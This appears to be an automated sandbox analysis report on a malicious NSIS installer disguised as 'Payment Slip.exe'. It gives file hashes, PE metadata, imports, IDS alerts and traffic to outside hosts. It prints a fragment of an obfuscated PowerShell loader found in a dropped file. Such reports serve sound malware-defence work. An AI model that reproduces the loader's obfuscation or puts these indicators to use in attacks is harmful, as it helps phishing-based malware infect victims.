SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\Masculinity.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	874096
Entropy (8bit):	7.618941362093886
Encrypted:	false
SSDEEP:	12288:Qt7ExDo//OtX1lxawkeVCGmQzVuoLZJBduEeelp6ai9QahX/tqRcTAcifEMXGwOF:cYDoeMwkejuoLDLXkaSQaBtXEQEjEfh
MD5:	DB9B31DA65D0EF913176D54CEB4CF5F4
SHA1:	5878F8C4E6B82EF6C9D32C020BB9D5898E973E96
SHA-256:	893B893178434A4273089C619B1ACAEFAB661C6D647D832A6375FB53E2753669
SHA-512:	703BC36BF7005A0AD315D734D67D304E07303D804858C4BDF43433732E15517C41BDF26DBC58E0A739B08C8E3C084CE09E61254EBCE6C4F40B10791A290529C4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@..................................1.......................................t...........Y...........>...............................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....Y.......Z...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Masculinity.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzkdiry2.t22.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm21usp2.sdq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Krnemlk.Cig255

Download File

Process:	C:\Users\user\Desktop\Payment Slip.exe
File Type:	data
Category:	dropped
Size (bytes):	351899
Entropy (8bit):	7.617857096837891
Encrypted:	false
SSDEEP:	6144:shXCYx099Hxs5P9wJsDSJyc/5g34wYuFh8TbjNjnHMp8c7GW0NyU:shXCp9RmP9AsDE/5g38uFhEbj28yU
MD5:	F8435A0869A068FBFDEEB94CD74F40B0
SHA1:	AB56FCE05AB0038D7420A19795F3631EDF9D7943
SHA-256:	747415DC76E298B9AB61608E415000772F0B9FB10FC98AF8F2D9391B9D08AD8E
SHA-512:	7E2C8669A3D62E5B9196CB66CD4C59CC29877DE0632F3BC36797EA755672F05F235590222C5506C7CB0FE2042D139D42F4BB26497467DE8E2F3D72F923FBE6C7
Malicious:	false
Preview:	......................kk......cc.##..e.G....8.uuu..>........N......D.t........;..$.+.....w.......4...&........................mm.........'.......................jj.........dd............9999..............==........\.............E....LL.............BBBB.....N.................................................}...........$$$$............................E........ttttt...)))............//....H..uu...............................kkkk.............?.....mmm..~..........}..........................K.........................00..////.....G...................]..+...........P.bbbb..."......................&..[..................xx................nnn...........................g.ggggg..........[.2........c.....**...............................s........BB....../...dd.......{.............BBB........................................P.....I...............q.d.U.Q........<..;;......>..................(.................zz.....~.....;.............................................e...............UUUUUU..cc.U.....

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San

Download File

Process:	C:\Users\user\Desktop\Payment Slip.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	71333
Entropy (8bit):	5.183364102049008
Encrypted:	false
SSDEEP:	1536:uQtOY0eXpfTsEr/aTT50Ewm+VF95VMJ6X3i+F+ElmBXWBkWQncphT:uQtOY0eXpfrrC50E1uL5VMJ6Cn/Okyn
MD5:	5F8EB18EF6FCE8E3FC026B2F93007A65
SHA1:	D5BB91CD2806BE9B97218CBBE24C5D04A211CC17
SHA-256:	AC3795FD2314BB76E57E50C7FDE085630BD9DDD66698E8870535962A368C72B5
SHA-512:	EDF1207FEEEE29868459018BCFAABA67E3891BCBC0716F040F9DA2748FD4AAB26E795E0BF3A5EE2C5B4FCC79FC1F0CBFE89CA9C4B9D79393E61881A54512AB36
Malicious:	true
Preview:	$Preopinionated=$Politimssigizzarro;<#Storbritanniens Ramponerede Porphyrization adhibits Choise #><#Synapticulate Sandaliform Whiglet Snickdrawing Annelieses ekacaesium #><#Korna Oka Unhaziness #><#Blunderer Illegitimatise Helvetii Trffende lagringspriser #><#Unsulliable Martyrologistic Janett Chromophotolithograph #><#Estramazone Straksfradragene belie Kobberstik Sejlbrtter Reshaper Myldrets #>$Kppenes = " In.tra;Smother`$ erhv rNextradioTrusteen To.stir Fas.ioe InoculcFarupudoPerver,r HviidsdStreptoiBefolknn Eftermg maste,=Skiltef`$uvedk.mDSlutlinu Ef erdsBowbentt UbestabFakkeleiDagtimen Amt.ra;OmorganFParatyfuGeopolinSalicylc HeroditD skussiGo.fieroSvmmefonKneadab AnmeldeMSrtryksi ReefabsUkorrekc etransapr,longsHomotaxtUndr adeMi rencd Nedton8Phyllou5ru,icon En.chun(Holobla`$PrinciplSvaleroeServicevCompletiStjgrnstTibeta.iTroljercDepotinire lektsRack,timP.ocell,Fangele uncynic`$ TyvestRStykkeverekap.tcSammenhl Brikvva qualmisForsigtsSygn.reiAn,trgef EmbedsicadwallcChironoaNationat

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl

Download File

Process:	C:\Users\user\Desktop\Payment Slip.exe
File Type:	data
Category:	dropped
Size (bytes):	629448
Entropy (8bit):	1.257234589035216
Encrypted:	false
SSDEEP:	1536:LD3CLXCvTm3+3JOgkFWZfcDkZLwWIE4pzswWg95LDsRgtlVkIRh:X3US6uZOgk2fcJl5FWy5LDEQlK0
MD5:	B9E5947712FA407B58A8527B52CE050E
SHA1:	9FD16F2F3569FF478C591E16A03EF65F7D63E57E
SHA-256:	30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
SHA-512:	BBCF1AC518547982928276E01EA61C26600A426EBD57928A82801F5ACBD8E2047359AC1CB41DEB0898CFB5D10BAA419C782C910830517C3F44F555963D6EEB9D
Malicious:	false
Preview:	....,......................................................................k............\..................................J.................................................}.......................R....................... ........k...........$.....................................................'............ ...............................I....................2................=.................................................................................................................d.................................................................g..............................................X.....................j............................................................................4....mJ..T...Z......................... ..................Y......Z.......................................U.............L....u..S......................................................U.................................U..................................................e.........................

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\lokalplanrammes.sus

Download File

Process:	C:\Users\user\Desktop\Payment Slip.exe
File Type:	data
Category:	dropped
Size (bytes):	221081
Entropy (8bit):	1.2406328235167285
Encrypted:	false
SSDEEP:	768:+sNmrp+QYzgwtqzOh8mcMPPy14oMvFzm8w/Y8vnLXWY8UBiBXVO3FzxrFUHItn4x:Y9A/S50ytu8voKwH
MD5:	D0A61E12A7A27A4B719AB0C4B9F57B88
SHA1:	55A349C760BA7AF05C54934924E2C0289BB3FF24
SHA-256:	243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
SHA-512:	3F117A4C26DDC7200AF9A79E8965F4396D175B368FF372BC7210929B15BA43B56EF68C6870F914638EC49ADF18CB553DF4492F583485ECC954C0238CC1405670
Malicious:	false
Preview:	.....................I...............................................\..................................Y.............................^...............................................................=..........e........................C....P................................`...............-.........................'.........................................................M.........................D....................[@..........................................H..........A...........................................d.........Lk.........................H.......n..............................................................................................C.........................4...v........................JU........&..................................................................]..... ....................................N..............................'.............................^.........................................................................k...............*...............

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\ondskabsfuldhedernes.txt

Download File

Process:	C:\Users\user\Desktop\Payment Slip.exe
File Type:	ASCII text, with very long lines (367), with CRLF line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	4.2802377004664205
Encrypted:	false
SSDEEP:	12:QEUc9mHApTzMcC94e7q6hDwyK2Xkj9rKZaq:l9JTMp7AyKykBrk
MD5:	9524154CFD936F21394F74D000856732
SHA1:	3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3
SHA-256:	8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
SHA-512:	4DA2F73D1D6F027B9C939785F63D6F75477F978AB7F8532D8395D5C5C346397E1E4B090CC815AA5F75E2629F81C1FD64B7246266331DBB26D3B0075CE4579250
Malicious:	false
Preview:	habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious deklinationen armiferous bryggerkar totaktsmotorernes ombudsmandsudtalelsers overtinsel metronidazole uldspind..unmortifiedness ildspaasttelserne plagiostomata klauss ryaerne carline,

C:\Users\user\AppData\Local\Temp\nsw288F.tmp

Download File

Process:	C:\Users\user\Desktop\Payment Slip.exe
File Type:	data
Category:	dropped
Size (bytes):	1283861
Entropy (8bit):	3.9234305452380744
Encrypted:	false
SSDEEP:	12288:MhXCp9RmP9AsDE/5g38uFhEbj28yuoSV/8Qjk5Cact5v:M9QkAsY/+jhZ82S2Ek4v
MD5:	981FB438C385528AA68E93252C8E410C
SHA1:	24B18B7E3E2CFBEE8C8790D950570DD420217654
SHA-256:	A85235CDD2E9FC521C9E340DB3D024E08AC62E02AC875364889186CB6C935D2B
SHA-512:	F3665F8F34D20D28584866B94A37D9D0A2B43CD629202E9BACD08B47F06E752BF8C3EAC3ABA4322504E042C0BAC456DA34B9052E88765F77DD3B8C55E1F87F7C
Malicious:	false
Preview:	.%......,...................T............$.......%........................................................................................................................................................................................................................................G...f...............j...............................................................................................................................v...............3.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.618941362093886
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment Slip.exe
File size:	874'096 bytes
MD5:	db9b31da65d0ef913176d54ceb4cf5f4
SHA1:	5878f8c4e6b82ef6c9d32c020bb9d5898e973e96
SHA256:	893b893178434a4273089c619b1acaefab661c6d647d832a6375fb53e2753669
SHA512:	703bc36bf7005a0ad315d734d67d304e07303d804858c4bdf43433732e15517c41bdf26dbc58e0a739b08c8e3c084ce09e61254ebce6c4f40b10791a290529c4
SSDEEP:	12288:Qt7ExDo//OtX1lxawkeVCGmQzVuoLZJBduEeelp6ai9QahX/tqRcTAcifEMXGwOF:cYDoeMwkejuoLDLXkaSQaBtXEQEjEfh
TLSH:	510502413292ED50D8150D741507C7858FB29E202E56EAC73B58B7AFDE3BBC27B0A297
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@

File Icon


Icon Hash:	293cc0c898b02800

Static PE Info

General

Entrypoint:	0x403358
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Underarmes Atrofisk possession ", O=fljdres, L=Freden (Leine), S=Niedersachsen, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	11/05/2024 09:21:13 11/05/2027 09:21:13
Subject Chain	CN="Underarmes Atrofisk possession ", O=fljdres, L=Freden (Leine), S=Niedersachsen, C=DE
Version:	3
Thumbprint MD5:	447DE2E793AC09ED6F34F16F8FF6FF3B
Thumbprint SHA-1:	36F3A06EAC92D37CEF32F71A8D8796440F26E182
Thumbprint SHA-256:	7B2EE0A9A807A3ED368453AF59015BADC1FF44463A11C28681792AB96FEB327B
Serial:	6686AA04A4D236B2441A3657CF74A296E9F43E65

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007FD52D0F26ECh
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007FD52D0F2357h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007FD52D0F2345h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007FD52D0EF83Ah
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007FD52D0F1D96h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007FD52D0EF8FEh
push 00000020h
pop edx
cmp cx, dx
jne 00007FD52D0EF839h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007FD52D0EF82Bh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x48000	0x55918	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd3ea0	0x17d0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	e8f12472e91b02deb619070e6ee7f1f4	False	0.6566569010416666	data	6.419409887460116	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	a5ec1b720d350c6303a7aba8d85072bf	False	0.4733072916666667	data	3.7600484096214832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x1e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x48000	0x55918	0x55a00	3d6a8b72f49b497aa2f6e828f36e2071	False	0.6818487682481752	data	6.750089044557724	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x486e8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.48516798769667574
RT_ICON	0x58f10	0x104d3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004043671653862
RT_ICON	0x693e8	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5461162497372294
RT_ICON	0x72890	0x6b94	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.995279593318809
RT_ICON	0x79428	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5835951940850277
RT_ICON	0x7e8b0	0x4c28	Device independent bitmap graphic, 128 x 256 x 8, image size 16384	English	United States	0.46250512925728354
RT_ICON	0x834d8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5978979688238073
RT_ICON	0x87700	0x2d6f	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9944114865445791
RT_ICON	0x8a470	0x2ca8	Device independent bitmap graphic, 96 x 192 x 8, image size 9216	English	United States	0.5530090972708187
RT_ICON	0x8d118	0x2868	Device independent bitmap graphic, 128 x 256 x 4, image size 8192	English	United States	0.31254833720030933
RT_ICON	0x8f980	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6519709543568465
RT_ICON	0x91f28	0x1bc8	Device independent bitmap graphic, 72 x 144 x 8, image size 5184	English	United States	0.6259842519685039
RT_ICON	0x93af0	0x16e8	Device independent bitmap graphic, 96 x 192 x 4, image size 4608	English	United States	0.3922237380627558
RT_ICON	0x951d8	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096	English	United States	0.68688293370945
RT_ICON	0x96800	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7211538461538461
RT_ICON	0x978a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.7316098081023454
RT_ICON	0x98750	0xde8	Device independent bitmap graphic, 72 x 144 x 4, image size 2592	English	United States	0.4393258426966292
RT_ICON	0x99538	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.5041291291291291
RT_ICON	0x99fa0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.7872950819672131
RT_ICON	0x9a928	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.8375451263537906
RT_ICON	0x9b1d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576	English	United States	0.875
RT_ICON	0x9b898	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.5682926829268292
RT_ICON	0x9bf00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.7890173410404624
RT_ICON	0x9c468	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8625886524822695
RT_ICON	0x9c8d0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.7204301075268817
RT_ICON	0x9cbb8	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.805327868852459
RT_ICON	0x9cda0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.8040540540540541
RT_DIALOG	0x9cec8	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x9cfe8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x9d108	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x9d1d0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x9d230	0x180	Targa image data - Map 32 x 1235 x 1 +1	English	United States	0.5442708333333334
RT_VERSION	0x9d3b0	0x260	data	English	United States	0.5263157894736842
RT_MANIFEST	0x9d610	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T10:05:32.773119+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49719	80	192.168.2.5	193.122.6.168
2024-07-25T10:04:28.575054+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49706	20.12.23.50	192.168.2.5
2024-07-25T10:05:06.827230+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49714	20.12.23.50	192.168.2.5
2024-07-25T10:05:23.882523+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49716	80	192.168.2.5	193.122.6.168
2024-07-25T10:05:24.468328+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49718	443	192.168.2.5	188.114.97.3
2024-07-25T10:05:21.569955+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49716	80	192.168.2.5	193.122.6.168
2024-07-25T10:05:10.710092+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	49715	443	192.168.2.5	108.167.181.251
2024-07-25T10:06:02.130852+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49732	443	192.168.2.5	188.114.97.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 10:05:09.999167919 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:09.999207020 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:09.999356031 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.015091896 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.015104055 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.511921883 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.512032032 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.574161053 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.574174881 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.574462891 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.574529886 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.593935966 CEST	49715	443	192.168.2.5	108.167.181.251
